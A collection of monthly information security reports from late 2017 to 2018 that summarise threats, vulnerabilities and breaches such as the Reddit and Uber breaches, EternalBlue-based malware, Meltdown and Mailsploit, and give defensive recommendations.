    Reddit released a statement advising users that they suffered a data breach earlier in the month. According to the statement, the attacker gained access to a backup of the 2007 database containing usernames and salted passwords. While the system was protected by SMS two factor authentication, it was found the attacker was able to capture the second factor using an SMS intercept.
    Users whose data was exposed have been sent an email from Reddit with instructions on the next steps they need to take. Reddit have changed their second factor authentication method to use a token-based method and is recommending all their users to do the same. (4)

Other News


  • Google Chrome to Block Third Party Code Injection:
    A number of anti-virus vendors follow the practice of injecting their own code into web browser processes to add their own protection against malicious sites the user visits. The practice often allows them to restrict the categories of the web sites users can visit and also scan pages for occurrences of malware. While the injection of this code is designed to make the browsing experience more secure, it is not officially supported by the browser manufacturers and can make them unstable. In response to this, Google has announced they will begin notifying users, after a browser crash, of any other software which is injecting code into the browser process. Additionally, Google has announced that in future versions of Chrome, they will begin to outright block the injection of third-party code into their browser processes. It is currently not known what impact (if any) this will have on the overall security of web browsing using Chrome, and the feature is still in a trial rollout phase. Additional information will be provided by Google in the coming months. (5)
  • Browsers to Distrust Symantec TLS Certificates:
    The nightly build of FireFox version 63 is now showing an untrusted certificate warning for certificates issued by Symantec. The action has seen the distrust of all Symantec issued certificates, as well as subsidiary certificate authorities including Thawte, GeoTrust and RapidSSL. It is recommended that website administrators replace certificates issued by the above certificate authorities as soon as possible. Digicert (who has taken over the issuance of Symantec issued certificates) is offering a replacement certificate at no additional cost to the administrator. By updating the certificate, it will ensure users are not presented with the invalid certificate warning page when visiting your site. It is recommended that website admins obtain new certificates no later than October 2018 as this is when the feature is planned to be introduced into the mainstream versions of both FireFox and Google Chrome. (6)

References

Information Security Report – March 2018


Current Threats and Exploits


  • Crypto Miners Are Sneaking To Your Networks – Despite dropping off a little in the news this month, crypto currency is still a much sought after commodity for many. Attackers are looking to cash in on this to do anything possible in order to make good use of your idle CPU time. In the past we have seen malware, advertising, worms and phishing campaigns aiming to deploy mining scripts or software on unsuspecting victims. It was recently reported that a large number of websites around the world were hijacked with crypto mining scripts as a result of a compromised plugin script. As a result of this, users visiting the site were redirected to execute coinhive mining scripts for the attacker, and although this method is used by advertisers to monetise sites, the incident highlighted the importance of knowing your online supply chain (and where you get your web resource scripts from).
  • Shortened URLs In Phishing – It has been observed in the wild that shortened URLs are increasingly being used again by active phishing campaigns. As a result of this, one of the core user awareness points for phishing of looking at the link is bypassed as most users will recognise and trust shortened URL services (such as Google and Bitly). Typically seen in campaigns targeting web mail credentials, this attack vector poses a significant risk to organisations and emphasises the importance of web content filtering. It is also recommended that users are made aware to be on the lookout for this type of activity.
  • Memcache Denial of Service Attacks – A huge number of Denial of service attacks are being staged from misconfigured internet facing memcache servers. These severs accept easily forged udp packets and this makes them perfect for reflected and amplified denial of service attacks. As this service was not designed to be exposed to the internet it is unlikely that any additional security will be configured, the remediation is to firewall off this service from the internet.

Read more on SANS ISC InfoSec Forums

Recent Breaches


  • Unsecured AWS Once Again Makes News – Poorly secured AWS S3 buckets continue to be a problem. Researchers have notified the LA Times after it was discovered that their unsecured Amazon S3 bucket had been cryptojacked and has been mining Monero cryptocurrency. The LA Times did not correctly configure their S3 buckets and as a result it was publicly writable.

Read more on naked security

Other News


    • Notifiable Data Breaches Scheme Comes into Effect – Australia’s Notifiable Data Breach scheme came into effect this month. This amendment to the Privacy Act enforces businesses under certain conditions to report data breaches to the Office of the Australian Information Commissioner. It is recommended that all organisations become aware of their responsibilities under these changes and update incident response plans as required to include these potential actions. For additional information please engage with your legal and / or privacy team.

Read more on ZDNet

    • Chrome will label HTTP sites as not secure – Starting from July the web browser Google Chrome will label sites visited using HTTP as non-secure. This is a move to hopefully uplift HTTPS adoption and ensure that sites default to the HTTPS version of the website.

Read more on ars TECHNICA

  • Importance of Multifactor Authentication In the Modern Enterprise – Multifactor authentication is a practical way to add security to the logon process by requiring multiple forms of identification as an addition to the username/password sequence. As the number of password exploits continue to increase, enterprises should look into available multifactor tools and integrate them into their infrastructure so as to secure logins and access to resources.

Read more on Search Security

Information Security Report – February 2018


Over the past month, we have seen a number of threats, vulnerabilities, and spear phishing attacks affecting organisations worldwide. Read on for a summary of these events to help you assess their implication on your environment.

Current Threats and Exploits


  • Refined Exploits Targeting Legacy Windows Servers and PCs: – The vulnerabilities discovered in SMBv1 servers (CVE-2017-0146 and CVE-2017-0143), can be used by remote attackers to execute arbitrary code via crafted packets, to the Microsoft SMB servers. Three exploits linked to these Microsoft vulnerabilities, have been rewritten and stabilised and can now impact all Windows operating systems starting with Windows 2000 up to and including Server 2016 edition. It is highly recommended to apply all software patches available as it is reported that these exploits are being used by worm malware to enable them to spread. Additional details on the recommended actions to take against these exploits can be found in the references below. (1)
  • WannaMine: Cryptocurrency Mining Malware: An EternalBlue based malware dubbed WannaMine was discovered to be using computing resources to mine cryptocurrency on infected systems. The malware initially uses password harvesting kit Mimikatz to steal usernames and passwords from system memory and EternalBlue exploits in order to spread around the network. (2)(3)
  • CISCO ASA Remote code execution and Denial of Service vulnerability:  A vulnerability in the Cisco SSL VPN functionality of Cisco ASA was discovered and is being actively scanned and attacked across the internet. Successful attacks allow the attacker to reload the device resulting in a denial of service, or run arbitrary code on the device by sending crafted XML packets to the webVPN interface. Users of Cisco ASA devices are recommended to check the running operating system version and upgrade soon as possible.(4)
  • Cisco IOS and IOS XE Software EnergyWise Denial of Service Vulnerabilities:  Multiple vulnerabilities in the EnergyWise module of Cisco IOS and Cisco IOS XE Software have been disclosed. These are caused by the improper parsing of crafted EnergyWise packets destined to an affected device. These vulnerabilities could allow an unauthenticated, remote attacker to cause a buffer overflow condition or a reload of an affected device, leading to a denial of service (DoS) condition. Cisco has released software updates that address these vulnerabilities. (5)
  • Lenovo Networking OS backdoor: A backdoor that has existed since 2004 has been removed from the Lenovo Networking OS in use by 16 IBM and 16 Lenovo network switches. This backdoor allows for administrative access to the device and Lenovo claim the backdoor was placed into the product by the now-defunct Nortel Networks. (6)
  • CISCO ASA 9000 IPv6 Fragmentation Packet Denial of Service:  Due to an incorrect handling of IPv6 packets in the Cisco ASA 9000 series, an unauthenticated reload of trident line cards is possible in routers running Cisco IOS XR Software Release 5.3.4. with IPv6 configured. Cisco have released software updates that resolve this issue. (7)(8)

Recent Breaches


  • Russian hackers hacked and published 2018 Winter Olympics emails: It is reported that Russian hackers calling themselves ‘FancyBear’ have retaliated to the banning of Russia from participating in the Winter Olympics by releasing emails regarding Olympic games scheduled in February in South Korea. It is alleged that the group is associated with military intelligence. The International Olympic Committee have not commented on the allegations brought forward by the leaked documents. (9)

Other News


  • Netflix phishing campaign: A phishing campaign was reported to hijack the Netfilix brand by tricking users to handing over their login details, credit card, mugshot, and their ID. The fraudsters used a fake website that had a valid HTTPS certificate to attempt to reassure users of the legitimacy of the website. (10)

References

Information Security Report – January 2018


Current Threats and Exploits


  • Meltdown? Spectre? Where Can We Find Out More? – Early January saw the industry start the year with a bang as rumors of an Intel bug being released online. Google’s Project Zero quickly announced on the 3rd of January that nearly all modern processors are affected by a vulnerability that when exploited can allow for potentially sensitive information to be accessed from memory across local security boundaries. A combined response from processor and operating system vendors is currently underway with most vendors releasing a statement or patch where applicable. It is recommended that local administrators investigate their organisations exposure to the bug and begin a remediation plan where possible. Additional detail and vendor responses can be found in the references below. (1, 2, 3, 4)
  • Risks Created by Bitcoins Surge in Popularity – Driven by the rise in value of bitcoin over in recent months, crypto currency has become a hot topic for those in and out of the IT space. With a large number of people newly becoming curious or looking to make some quick money in crypto markets, scammers and attackers have also been thinking about how they can leverage the new found popularity of these currencies. In recent months there has been an increase in bitcoin related phishing and online scams in an attempt to either steal bitcoin or wallet private keys / passwords from unsuspecting users.

Recent Breaches


  • Forever 21 POS Malware Reminds about Encrypting Data at Rest – Retailer Forever 21 announced that for 7 months last year a number of cash register and point of sale devices were infected with malware that was successfully able to swipe payment card details. In addition to this it was reported that the malware was also present on some systems and were able to view transactional logs on a central server that were generated by non-compromised devices. It has been confirmed that encryption on these devices was not always enabled, and during periods where encryption was not enabled the logs could be read by the malware which would search for payment card details. Although POS malware is a constant threat, it is also important to ensure you are aware of all systems in your organisation that hold or process any form of payment card information. Regular testing and quality control of controls such as encryption of data at rest, and reduction of sensitive information in logs can ensure that in the event of compromise, the malware would not be able to find sensitive information. (8)
  • Leaky (S3) Buckets At it Again – Once again, a publicly exposed Amazon S3 bucket containing sensitive information was found. This time the information contained details on an estimated 123 million American households. With more companies using cloud services for storage and business, it is important to gain a good understanding of the access controls in place for data kept in the cloud. Regular reviews of access to your cloud services and data is also recommended. If you are looking for more information about securing S3, see this article here. (9)

Other News


  • What to expect in 2018 – With 2017 teaching us all some new lessons about patch management, ransomware, crypto currencies and securing the cloud, it is expected that 2018 will provide a similar education. With more companies looking to invest in the cloud and in new technologies, there is an increased risk in how we can better secure the modern business. The internet of things and the issues these devices have faced in the past is a constant reminder of this. Further to this it is expected that financially motivated cybercrime will remain a constant threat through the means of social engineering/phishing, crypto-currency targeted malware and possibly more organisation specific ransomware. From a defender perspective, it is expected that two factor authentication (2FA) will increase significantly. As many credential based attacks can be mitigated by enabling 2FA, and with 2FA gaining wide-spread support (especially in the cloud and online services), 2018 should see a welcomed increase in 2FA uptake. (10)

References

Information Security Report – December 2017


Over the past month, we have seen a number of threats, vulnerabilities, and spear phishing attacks affecting organisations worldwide. Read on for a summary of these events to help you assess their implication on your environment.

Threats and Exploits


Mailsploit

Mailsploit Allows Spoofed Mails to Fool DMARC. Mailsploit is a collection of vulnerabilities in various email clients which allow an attacker to perform code injection attacks, spoof senders and bypass email protection mechanisms such as DMARC(DKIM/SPF). The security researcher who developed Mailsploit described how Mailsploit allows an attacker to send emails from any address they choose by taking advantage of how servers validate the DKIM signature of the original domain and not the spoofed one. It has been reported that this technique does not currently get detected or blocked by the majority of mail client vendors.

All major email clients and web mail vendors were notified about Mailsploit prior to its public release, however a large number of popular clients still remain vulnerable.

The list of impacted mail clients can be found here >>

It is recommended that users should update their email client whenever there’s a software update available, use end-to-end encrypted messages for personal conversations and at work and/or use PGP/GPG to verify the identities and encrypt email contents.

You can read more on Mailsploit on info security magazine and mailsploit.com

Spear Phishing

Huge Increase in Email Impersonation Attacks: According to Email Security Risk Assessment (ESRA) report, a report released byMimecast Data Security, it was discovered that although organisations continue to face an ongoing threat from malware, the fastest growing threat is impersonation attacks. An organisation is seven times more likely to be hit by an impersonation attack than by email-borne malware. These attacks are also known as whaling or spear phishing where attackers trick recipients into wiring money transfers to the fraudster. These scams are highly targeted and often done after a cybercriminal has gathered enough information to send the right person the right message. These attacks continue to grow faster than malware due to the fact that it’s very hard for traditional defenses like email filters to detect them.

Good user training will give an edge in avoiding most of these payment and impersonation scams. A few other tips for security teams to help combat the social engineering threat include:

  • Conducting internal phishing by phishing your own employees and sharing the results of the testing with them so that they can learn what to look out for. This should be combines with good training on how the users can detect the phishing emails.
  • Impersonation attacks often try to mimic emails from C-level executives. Implement a company policy that closes scam avenues for would-be spear phishers (e.g., never request the sharing of sensitive documents via email).
  • Disable links inside email bodies to force users to manually navigate to the site mentioned in the email. It adds extra steps, but it can prevent a user from clicking on a phishing link by accident.

Read more on info security magazine and TechRepublic

 

Security News and Alerts

Get updates and exclusive content from our security experts
  • This field is for validation purposes and should be left unchanged.

 

Breaches


Virtual Keyboard App Data Breach

Massive Breach Exposes Keyboard App that Collects Personal Data on its 31 Million Users. A team of security researchers have discovered a huge trove of personal data of the users of the virtual keyboard app ‘AI.type’ that was accidentally leaked online for any one to download. This app is a customization for on-screen keyboards on mobile phones and tablets with more than 40 million users worldwide. It is reported that the app requests for ‘full access’ to all user data stored on the phone and appears to collect everything from contacts to keystrokes. The leaked data includes full names, phone numbers, email addresses, device information including device name, screen resolution, model details, android version, mobile network name, country of residence, GPS location and even links and information associated with social media profiles.

Events such as this raise the question about what permissions mobile applications have on our devices (and just how much access these applications NEED). In order to best protect yourself against this form of application privilege abuse, it is recommended to always read and be cautious of what access is granted to applications.

Read more on The Hacker News

Uber Technologies Data Breach

Personal data of 57 million customers and drivers was stolen last year from ride-sharing company Uber with the breach revealed to have been concealed by the company for more than a year. It is suggested that the company paid $100,000 to the attackers. The company however advised that no social security numbers, credit card information, trip location details or other data were taken. Uber is being condemned for how it chose to deal with the issue after discovery of the attack and has also been sued for negligence over the breach by a customer.

It is reported that two attackers were able to retrieve login credentials from a private GitHub coding site which they used to access Uber data from an Amazon Web Services account where they discovered customer and driver related information. Although there are state and federal laws in the United States that require companies to alert people and government agencies when sensitive data breaches occur, Uber failed to comply.

Read more on Bloomberg.com

Breach at PayPal Subsidiary Affects 1.6 Million Customers. Paypal disclosed on 1st December 2017 a data breach on its recently acquired company TIO Networks. Personal information for 1.6 million individuals may have been compromised. TIO is based in Canada and serves some of the largest telecom and utility network operator in North America. Paypal pointed out that the Paypal platform has not been impacted as the TIO systems have not been integrated into its own platform. Paypal advised that affected companies and individuals would be contacted via mail and email, and offered free credit monitoring services via Experian. The data breach was discovered as part of ongoing investigations for identifying vulnerabilities in the processing platform.

Read more on SecurityWeek.com

Other News


Simulated Attacks Uncover Real-World Problems in IT Security. A research report by SafeBreach, a cybersecurity company that has developed a platform that simulates hacker breach methods, reveals that virtual hackers “have a 60% success rate of using malware to infiltrate networks. And once in, the malware could move laterally almost 70% of the time. In half the cases, they could exit networks with data.” The research found that it was not hard to get past the perimeter and once in, it was easy for attackers to move around and exfiltrate data. This is because most organisations overlook concerns over lateral movement as they mostly focus on the perimeter.

According to the report, malware infiltration methods like nesting or “packing” malware executables were effective in bypassing security controls 50% of the time. The success rate of infiltrating a network using packed executables was found to be 55%-61% using JavaScript, VBScript (VBS) using HTTP and using HTML file format (CHM) extension. It is recommended that network security controls should be VBScript (VBS) using HTTP and using HTML file format (CHM) extension. It is recommended that network controls should be configured to scan for malicious files and block them before they make their way to the endpoints/hosts for installation to disk. The report
further outlines how cybercriminals exfiltrate data using the easiest methods which are often through traditional clear or encrypted Web traffic. Ports having the highest exfiltration success rate include Port 443 (HTTPS) and Port 123 (NTP).

It is recommended that in order to better protect resources, organisations should optimize their current security solutions, constantly update the configurations as needed, and then test the changes they make.

Read more on DARKReading.com